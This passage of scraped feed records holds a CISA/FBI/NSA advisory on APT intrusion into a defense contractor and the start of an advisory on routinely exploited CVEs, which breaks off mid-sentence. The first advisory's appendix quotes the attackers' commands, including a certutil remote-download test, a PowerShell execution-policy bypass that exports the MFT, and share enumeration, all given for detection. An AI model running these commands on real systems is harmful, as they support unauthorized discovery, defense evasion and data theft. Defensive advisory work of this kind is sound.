\nFile and Directory Discovery\n\n| \n\n[T1083](<https://attack.mitre.org/techniques/T1083>)\n\n| \n\nActors enumerated files and directories or may search in specific locations of a host or network share for certain information within a file system. \n \nVirtualization/Sandbox Evasion: System Checks\n\n| \n\n[T1497.001](<https://attack.mitre.org/techniques/T1497/001>)\n\n| \n\nActors used Windows command shell commands to detect and avoid virtualization and analysis environments. \n \n_Lateral Movement_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nRemote Services: SMB/Windows Admin Shares\n\n| \n\n[T1021.002](<https://attack.mitre.org/techniques/T1021/002>)\n\n| \n\nActors used Valid Accounts to interact with a remote network share using Server Message Block (SMB) and then perform actions as the logged-on user. \n \n_Collection_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nArchive Collected Data: Archive via Utility\n\n| \n\n[T1560.001](<https://attack.mitre.org/techniques/T1560>)\n\n| \n\nActor used PowerShell commands and WinRAR to compress and/or encrypt collected data prior to exfiltration. \n \nData from Network Shared Drive\n\n| \n\n[T1039](<https://attack.mitre.org/versions/v11/techniques/T1039/>)\n\n| \n\nActors likely used net share command to display information about shared resources on the local computer and decide which directories to exploit, the powershell dir command to map shared drives to a specified path and retrieve items from another, and the ntfsinfo command to search network shares on computers they have compromised to find files of interest.\n\nThe actors used dir.exe to display a list of a directory's files and subdirectories matching a certain text string. \n \nData Staged: Remote Data Staging\n\n| \n\n[T1074.002](<https://attack.mitre.org/versions/v11/techniques/T1074/002/>)\n\n| \n\nThe actors split collected files into approximately \n3 MB chunks located on the Exchange server within the CU2\\he\\debug directory. \n \n_Command and Control_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nNon-Application Layer Protocol\n\n| \n\n[T1095](<https://attack.mitre.org/techniques/T1095>)\n\n| \n\nActors used a non-application layer protocol for communication between host and Command and Control (C2) server or among infected hosts within a network. \n \nIngress Tool Transfer\n\n| \n\n[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)\n\n| \n\nActors used the certutil command with three switches to test if they could download files from the internet.\n\nThe actors employed CovalentStealer to exfiltrate the files. \n \nProxy\n\n| \n\n[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)\n\n| \n\nActors are known to use VPN and VPS providers, namely M247 and SurfShark, as part of their techniques to access a network remotely. \n \n_Exfiltration_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nSchedule Transfer\n\n| \n\n[T1029](<https://attack.mitre.org/versions/v11/techniques/T1029/>)\n\n| \n\nActors scheduled data exfiltration to be performed only at certain times of day or at certain intervals and blend traffic patterns with normal activity. \n \nExfiltration Over Web Service: Exfiltration to Cloud Storage\n\n| \n\n[T1567.002](<https://attack.mitre.org/versions/v11/techniques/T1567/002>)\n\n| \n\nThe actor's CovalentStealer tool stores collected files on a Microsoft OneDrive cloud folder. \n \n### DETECTION\n\nGiven the actors\u2019 demonstrated capability to maintain persistent, long-term access in compromised enterprise environments, CISA, FBI, and NSA encourage organizations to:\n\n * Monitor logs for connections from unusual VPSs and VPNs. Examine connection logs for access from unexpected ranges, particularly from machines hosted by SurfShark and M247.\n * Monitor for suspicious account use (e.g., inappropriate or unauthorized use of administrator accounts, service accounts, or third-party accounts). To detect use of compromised credentials in combination with a VPS, follow the steps below: \n * Review logs for \"impossible logins,\" such as logins with changing username, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user\u2019s geographic location.\n * Search for \"impossible travel,\" which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). Note: This detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks.\n * Search for one IP used across multiple accounts, excluding expected logins. \n * Take note of any M247-associated IP addresses used along with VPN providers (e.g., SurfShark). Look for successful remote logins (e.g., VPN, OWA) for IPs coming from M247- or using SurfShark-registered IP addresses.\n * Identify suspicious privileged account use after resetting passwords or applying user account mitigations.\n * Search for unusual activity in typically dormant accounts.\n * Search for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.\n * Review the YARA rules provided in MAR-10365227-1 to assist in determining whether malicious activity has been observed.\n * Monitor for the installation of unauthorized software, including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect).\n * Monitor for anomalous and known malicious command-line use. See Appendix: Windows Command Shell Activity for commands used by the actors to interact with the victim\u2019s environment.\n * Monitor for unauthorized changes to user accounts (e.g., creation, permission changes, and enabling a previously disabled account).\n\n### CONTAINMENT AND REMEDIATION\n\nOrganizations affected by active or recently active threat actors in their environment can take the following initial steps to aid in eviction efforts and prevent re-entry:\n\n * Report the incident. Report the incident to U.S. Government authorities and follow your organization\u2019s incident response plan. \n * Report incidents to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870).\n * Report incidents to your local FBI field office at [fbi.gov/contact-us/field-offices](<http://www.fbi.gov/contact-us/field>) or to FBI\u2019s 24/7 Cyber Watch (CyWatch) via (855) 292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).\n * For DIB incident reporting, contact the Defense Cyber Crime Center (DC3) via DIBNET at [dibnet.dod.mil/portal/intranet](<https://dibnet.dod.mil/portal/intranet>) or (410) 981 0104.\n * Reset all login accounts. Reset all accounts used for authentication since it is possible that the threat actors have additional stolen credentials. Password resets should also include accounts outside of Microsoft Active Directory, such as network infrastructure devices and other non-domain joined devices (e.g., IoT devices).\n * Monitor SIEM logs and build detections. Create signatures based on the threat actor TTPs and use these signatures to monitor security logs for any signs of threat actor re-entry.\n * Enforce MFA on all user accounts. Enforce phishing-resistant MFA on all accounts without exception to the greatest extent possible.\n * Follow Microsoft\u2019s security guidance for Active Directory\u2014[Best Practices for Securing Active Directory](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory>).\n * Audit accounts and permissions. Audit all accounts to ensure all unused accounts are disabled or removed and active accounts do not have excessive privileges. Monitor SIEM logs for any changes to accounts, such as permission changes or enabling a previously disabled account, as this might indicate a threat actor using these accounts.\n * Harden and monitor PowerShell by reviewing guidance in the joint Cybersecurity Information Sheet\u2014[Keeping PowerShell: Security Measures to Use and Embrace](<https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/1/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF>).\n\n### Mitigations\n\nMitigation recommendations are usually longer-term efforts that take place before a compromise as part of risk management efforts, or after the threat actors have been evicted from the environment and the immediate response actions are complete. While some may be tailored to the TTPs used by the threat actor, recovery recommendations are largely general best practices and industry standards aimed at bolstering overall cybersecurity posture.\n\n### Segment Networks Based on Function\n\n * **Implement network segmentation to separate network segments based on role and functionality**. Proper network segmentation significantly reduces the ability for ransomware and other threat actor lateral movement by controlling traffic flows between\u2014and access to\u2014various subnetworks. (See CISA\u2019s Infographic on Layering Network Security Through Segmentation and NSA\u2019s [Segment Networks and Deploy Application-Aware Defenses](<https://media.defense.gov/2019/Sep/09/2002180325/-1/-1/0/Segment%20Networks%20and%20Deploy%20Application%20Aware%20Defenses%20-%20Copy.pdf>).)\n * **Isolate similar systems and implement micro-segmentation with granular access and policy restrictions** to modernize cybersecurity and adopt Zero Trust (ZT) principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration.\n\n### Manage Vulnerabilities and Configurations\n\n * **Update software**, **including operating systems**, **applications**, **and firmware**, **on network assets**. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.\n * **Implement a configuration change control process** that securely creates device configuration backups to detect unauthorized modifications. When a configuration change is needed, document the change, and include the authorization, purpose, and mission justification. Periodically verify that modifications have not been applied by comparing current device configurations with the most recent backups. If suspicious changes are observed, verify the change was authorized.\n\n### Search for Anomalous Behavior\n\n * **Use cybersecurity visibility and analytics tools** to improve detection of anomalous behavior and enable dynamic changes to policy and other response actions. Visibility tools include network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n * **Monitor the use of scripting languages** (e.g., Python, Powershell) by authorized and unauthorized users. Anomalous use by either group may be indicative of malicious activity, intentional or otherwise.\n\n### Restrict and Secure Use of Remote Admin Tools\n\n * **Limit the number of remote access tools as well as who and what can be accessed using them**. Reducing the number of remote admin tools and their allowed access will increase visibility of unauthorized use of these tools.\n * **Use encrypted services to protect network communications and disable all clear text administration services**(e.g., Telnet, HTTP, FTP, SNMP 1/2c). This ensures that sensitive information cannot be easily obtained by a threat actor capturing network traffic.\n\n### Implement a Mandatory Access Control Model\n\n * **Implement stringent access controls to sensitive data and resources**. Access should be restricted to those users who require access and to the minimal level of access needed.\n\n### Audit Account Usage\n\n * **Monitor VPN logins to look for suspicious access** (e.g., logins from unusual geo locations, remote logins from accounts not normally used for remote access, concurrent logins for the same account from different locations, unusual times of the day).\n * **Closely monitor the use of administrative accounts**. Admin accounts should be used sparingly and only when necessary, such as installing new software or patches. Any use of admin accounts should be reviewed to determine if the activity is legitimate.\n * **Ensure standard user accounts do not have elevated privileges** Any attempt to increase permissions on standard user accounts should be investigated as a potential compromise.\n\n### VALIDATE SECURITY CONTROLS\n\nIn addition to applying mitigations, CISA, FBI, and NSA recommend exercising, testing, and validating your organization's security program against threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA, FBI, and NSA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.\n\nTo get started:\n\n 1. Select an ATT&CK technique described in this advisory (see Table 1).\n 2. Align your security technologies against the technique.\n 3. Test your technologies against the technique.\n 4. Analyze the performance of your detection and prevention technologies.\n 5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\n 6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.\n\nCISA, FBI, and NSA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.\n\n### RESOURCES\n\nCISA offers several no-cost scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See [cisa.gov/cyber-hygiene-services](<https://www.cisa.gov/cyber-hygiene-services>).\n\nU.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center\u2019s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>).\n\n### ACKNOWLEDGEMENTS\n\nCISA, FBI, and NSA acknowledge Mandiant for its contributions to this CSA.\n\n### APPENDIX: WINDOWS COMMAND SHELL ACTIVITY\n\nOver a three-day period in February 2021, APT cyber actors used Windows Command Shell to interact with the victim\u2019s environment. When interacting with the victim\u2019s system and executing commands, the threat actors used /q and /c parameters to turn the echo off, carry out the command specified by a string, and stop its execution once completed.\n\nOn the first day, the threat actors consecutively executed many commands within the Windows Command Shell to learn about the organization\u2019s environment and to collect sensitive data for eventual exfiltration (see Table 2).\n\n_Table 2: Windows Command Shell Activity (Day 1)_\n\nCommand\n\n| \n\nDescription / Use \n \n---|--- \n \nnet share\n\n| \n\nUsed to create, configure, and delete network shares from the command-line.[[1](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh750728\$v=ws.11\$>)] The threat actor likely used this command to display information about shared resources on the local computer and decide which directories to exploit. \n \npowershell dir\n\n| \n\nAn alias (shorthand) for the PowerShell Get-ChildItem cmdlet. This command maps shared drives by specifying a path to one location and retrieving the items from another.[[2](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-childitem?view=powershell-7.2>)] The threat actor added additional switches (aka options, parameters, or flags) to form a \u201cone liner,\u201d an expression to describe commonly used commands used in exploitation: powershell dir -recurse -path e:\\<redacted>|select fullname,length|export-csv c:\\windows\\temp\\temp.txt. This particular command lists subdirectories of the target environment when. \n \nsysteminfo\n\n| \n\nDisplays detailed configuration information [[3](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo>)], tasklist \u2013 lists currently running processes [[4](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)], and ipconfig \u2013 displays all current Transmission Control Protocol (TCP)/IP network configuration values and refreshes Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings, respectively [[5](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ipconfig>)]. The threat actor used these commands with specific switches to determine if the system was a VMware virtual machine: systeminfo > vmware & date /T, tasklist /v > vmware & date /T, and ipconfig /all >> vmware & date /. \n \nroute print\n\n| \n\nUsed to display and modify the entries in the local IP routing table. [[6](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961510\$v=ws.11\$>)] The threat actor used this command to display the entries in the local IP routing table. \n \nnetstat\n\n| \n\nUsed to display active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics, and IPv6 statistics.[[7](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat>)] The threat actor used this command with three switches to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP: netstat -anp tcp. \n \ncertutil\n\n| \n\nUsed to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.[[8](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil>)] The threat actor used this command with three switches to test if they could download files from the internet: certutil -urlcache -split -f https://microsoft.com temp.html. \n \nping\n\n| \n\nSends Internet Control Message Protocol (ICMP) echoes to verify connectivity to another TCP/IP computer.[[9](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)] The threat actor used ping -n 2 apple.com to either test their internet connection or to detect and avoid virtualization and analysis environments or network restrictions. \n \ntaskkill\n\n| \n\nUsed to end tasks or processes.[[10](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/taskkill>)] The threat actor used taskkill /F /PID 8952 to probably disable security features. CISA was unable to determine what this process was as the process identifier (PID) numbers are dynamic. \n \nPowerShell Compress-Archive cmdlet\n\n| \n\nUsed to create a compressed archive or to zip files from specified files and directories.[[11](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.archive/compress-archive?view=powershell-7.2>)] The threat actor used parameters indicating shared drives as file and folder sources and the destination archive as zipped files. Specifically, they collected sensitive contract-related information from the shared drives. \n \nOn the second day, the APT cyber actors executed the commands in Table 3 to perform discovery as well as collect and archive data.\n\n_Table 3: Windows Command Shell Activity (Day 2)_\n\nCommand\n\n| \n\nDescription / Use \n \n---|--- \n \nntfsinfo.exe\n\n| \n\nUsed to obtain volume information from the New Technology File System (NTFS) and to print it along with a directory dump of NTFS meta-data files.[[12](<https://docs.microsoft.com/en-us/sysinternals/downloads/ntfsinfo>)] \n \nWinRAR.exe\n\n| \n\nUsed to compress files and subsequently masqueraded WinRAR.exe by renaming it VMware.exe.[[13](<https://www.rarlab.com/>)] \n \nOn the third day, the APT cyber actors returned to the organization\u2019s network and executed the commands in Table 4.\n\n_Table 4: Windows Command Shell Activity (Day 3)_\n\nCommand\n\n| \n\nDescription / Use \n \n---|--- \n \npowershell -ep bypass import-module .\\vmware.ps1;export-mft -volume e\n\n| \n\nThreat actors ran a PowerShell command with parameters to change the execution mode and bypass the Execution Policy to run the script from PowerShell and add a module to the current section: powershell -ep bypass import-module .\\vmware.ps1;export-mft -volume e. This module appears to acquire and export the Master File Table (MFT) for volume E for further analysis by the cyber actor.[[14](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2>)] \n \nset.exe\n\n| \n\nUsed to display the current environment variable settings.[[15](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/set_1>)] (An environment variable is a dynamic value pointing to system or user environments (folders) of the system. System environment variables are defined by the system and used globally by all users, while user environment variables are only used by the user who declared that variable and they override the system environment variables (even if the variables are named the same). \n \ndir.exe\n\n| \n\nUsed to display a list of a directory's files and subdirectories matching the eagx* text string, likely to confirm the existence of such file. \n \ntasklist.exe and find.exe\n\n| \n\nUsed to display a list of applications and services with their PIDs for all tasks running on the computer matching the string \u201cpowers\u201d.[[16](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)][[17](<https://attack.mitre.org/software/S0057/>)][[18](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/find>)] \n \nping.exe\n\n| \n\nUsed to send two ICMP echos to amazon.com. This could have been to detect or avoid virtualization and analysis environments, circumvent network restrictions, or test their internet connection.[[19](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)] \n \ndel.exe with the /f parameter\n\n| \n\nUsed to force the deletion of read-only files with the *.rar and tempg* wildcards.[[20](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/del>)] \n \n### References\n\n[[1] Microsoft Net Share](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh750728\$v=ws.11\$>)\n\n[[2] Microsoft Get-ChildItem](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-childitem?view=powershell-7.2>)\n\n[[3] Microsoft systeminfo](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo>)\n\n[[4] Microsoft tasklist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)\n\n[[5] Microsoft ipconfig](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ipconfig>)\n\n[[6] Microsoft Route](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961510\$v=ws.11\$>)\n\n[[7] Microsoft netstat](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat>)\n\n[ [8] Microsoft certutil](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil>)\n\n[[9] Microsoft ping](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)\n\n[[10] Microsoft taskkill](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/taskkill>)\n\n[[11] Microsoft Compress-Archive](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.archive/compress-archive?view=powershell-7.2>)\n\n[[12] NTFSInfo v1.2](<https://docs.microsoft.com/en-us/sysinternals/downloads/ntfsinfo>)\n\n[[13] rarlab](<https://www.rarlab.com/>)\n\n[[14] Microsoft Import-Module](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2>)\n\n[[15] Microsoft set (environment variable)](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/set_1>)\n\n[[16] Microsoft tasklist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)\n\n[[17] Mitre ATT&CK - Sofware: TaskList](<https://attack.mitre.org/versions/v11/software/S0057/>)\n\n[[18] Microsoft find](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/find>)\n\n[[19] Microsoft ping](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)\n\n[[20] Microsoft del](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/del>)\n\n### Revisions\n\nOctober 4, 2022: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T12:00:00", "type": "ics", "title": "Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-10-05T12:00:00", "id": "AA22-277A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-277a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:07:27", "description": "### Summary\n\nThis Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). \n\nThis advisory provides details on the top 30 vulnerabilities\u2014primarily Common Vulnerabilities and Exposures (CVEs)\u2014routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021. \n\nCyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide. However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system. \n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Key Findings\n\nIn 2020, cyber actors readily exploited recently disclosed vulnerabilities to compromise unpatched systems. Based on available data to the U.S. Government, a majority of the top vulnerabilities targeted in 2020 were disclosed during the past two years. Cyber actor exploitation of more recently disclosed software flaws in 2020 probably stems, in part, from the expansion of remote work options amid the COVID-19 pandemic. The rapid shift and increased use of remote work options, such as virtual private networks (VPNs) and cloud-based environments, likely placed additional burden on cyber defenders struggling to maintain and keep pace with routine software patching.\n\n**Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies. **Many VPN gateway devices remained unpatched during 2020, with the growth of remote work options challenging the ability of organizations to conduct rigorous patch management.\n\nCISA, ACSC, the NCSC, and FBI consider the vulnerabilities listed in table 1 to be the topmost regularly exploited CVEs by cyber actors during 2020. \n\n_Table 1:Top Routinely Exploited CVEs in 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nType \n \n---|---|--- \n \nCitrix\n\n| \n\nCVE-2019-19781\n\n| \n\narbitrary code execution \n \nPulse\n\n| \n\nCVE 2019-11510\n\n| \n\narbitrary file reading \n \nFortinet\n\n| \n\nCVE 2018-13379\n\n| \n\npath traversal \n \nF5- Big IP\n\n| \n\nCVE 2020-5902\n\n| \n\nremote code execution (RCE) \n \nMobileIron\n\n| \n\nCVE 2020-15505\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2017-11882\n\n| \n\nRCE \n \nAtlassian\n\n| \n\nCVE-2019-11580\n\n| \n\nRCE \n \nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nRCE \n \nTelerik\n\n| \n\nCVE 2019-18935\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2019-0604\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2020-0787\n\n| \n\nelevation of privilege \n \nMicrosoft\n\n| \n\nCVE-2020-1472\n\n| \n\nelevation of privilege \n \nIn 2021, malicious cyber actors continued to target vulnerabilities in perimeter-type devices. Among those highly exploited in 2021 are vulnerabilities in Microsoft, Pulse, Accellion, VMware, and Fortinet.\n\nCISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \n\nOrganizations are encouraged to remediate or mitigate vulnerabilities as quickly as possible to reduce the risk of exploitation. Most can be remediated by patching and updating systems. Organizations that have not remediated these vulnerabilities should investigate for the presence of IOCs and, if compromised, initiate incident response and recovery plans. See the Contact Information section below for how to reach CISA to report an incident or request technical assistance.\n\n### 2020 CVEs\n\nCISA, ACSC, the NCSC, and FBI have identified the following as the topmost exploited vulnerabilities by malicious cyber actors from 2020: CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2020-5902, CVE-2020-15505, CVE-2020-0688, CVE-2019-3396, CVE-2017-11882, CVE-2019-11580, CVE-2018-7600, CVE 2019-18935, CVE-2019-0604, CVE-2020-0787, CVE-2020-1472.[[1](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)][[2](<https://media.defense.gov/2021/May/07/2002637232/-1/-1/0/ADVISORY%20FURTHER%20TTPS%20ASSOCIATED%20WITH%20SVR%20CYBER%20ACTORS.PDF>)][[3](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)] Among these vulnerabilities, CVE-2019-19781 was the most exploited flaw in 2020, according to U.S. Government technical analysis.CVE-2019-19781 is a recently disclosed critical vulnerability in Citrix\u2019s Application Delivery Controller (ADC)\u2014a load balancing application for web, application, and database servers widely use throughout the United States.[[4](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)][[5](<https://www.ncsc.gov.uk/news/citrix-alert>)] Nation-state and criminal cyber actors most likely favor using this vulnerability because it is easy to exploit, Citrix servers are widespread, and exploitation enables the actors to perform unauthorized RCE on a target system.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)] \n\nIdentified as emerging targets in early 2020,[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)] unremediated instances of CVE-2019-19781 and CVE-2019-11510 continued to be exploited throughout the year by nation-state advanced persistent threat actors (APTs) who leveraged these and other vulnerabilities, such as CVE-2018-13379[[8](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)][[9](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)], in VPN services[[10](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>)][[11](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)] to compromise an array of organizations, including those involved in COVID-19 vaccine development.[[12]](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)[[13](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)]\n\nThe CVE-2019-11510 vulnerability in Pulse Connect Secure VPN was also frequently targeted by nation-state APTs. Actors can exploit the vulnerability to steal the unencrypted credentials for all users on a compromised Pulse VPN server and retain unauthorized credentials for all users on a compromised Pulse VPN server and can retain unauthorize access after the system is patched unless all compromised credentials are changed. Nation-state APTs also commonly exploited CVE-2020-15505 and CVE-2020-5902.[[14](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[15](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[16](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)][[17](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)]\n\n### 2021 CVEs\n\nIn 2021, cyber actors continued to target vulnerabilities in perimeter-type devices. In addition to the 2020 CVEs listed above, organizations should prioritize patching for the following CVEs known to be exploited. \n\n * **Microsoft Exchange: **CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 \n * See CISA\u2019s Alert: Mitigate Microsoft Exchange Server Vulnerabilities for more information on identifying and mitigating malicious activity concerning these vulnerabilities.\n * **Pulse Secure:** CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900 \n * See CISA\u2019s Alert: Exploitation of Pulse Connect Secure Vulnerabilities for more information on how to investigate and mitigate this malicious activity.\n * **Accellion:** CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104 \n * See the Australia-New Zealand-Singapore-UK-U.S. Joint Cybersecurity Advisory: Exploitation of Accellion File Transfer Appliance for technical details and mitigations.\n * **VMware:** CVE-2021-21985 \n * See CISA\u2019s Current Activity: Unpatched VMware vCenter Software for more information and guidance. \n * **Fortinet:** CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 \n * See the CISA-FBI Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks for more details and mitigations. \n\n### Mitigations and Indicators of Compromise\n\nOne of the most effective best practices to mitigate many vulnerabilities is to update software versions once patches are available and as soon as is practicable. If this is not possible, consider applying temporary workarounds or other mitigations, if provided by the vendor. If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems). This advisory highlights vulnerabilities that should be considered as part of the prioritization process. To further assist remediation, automatic software updates should be enabled whenever possible. \n\nFocusing scarce cyber defense resources on patching those vulnerabilities that cyber actors most often use offers the potential of bolstering network security while impeding our adversaries\u2019 operations. For example, nation-state APTs in 2020 extensively relied on a single RCE vulnerability discovered in the Atlassian Crow, a centralized identity management and application (CVE-2019-11580) in its reported operations. A concerted focus on 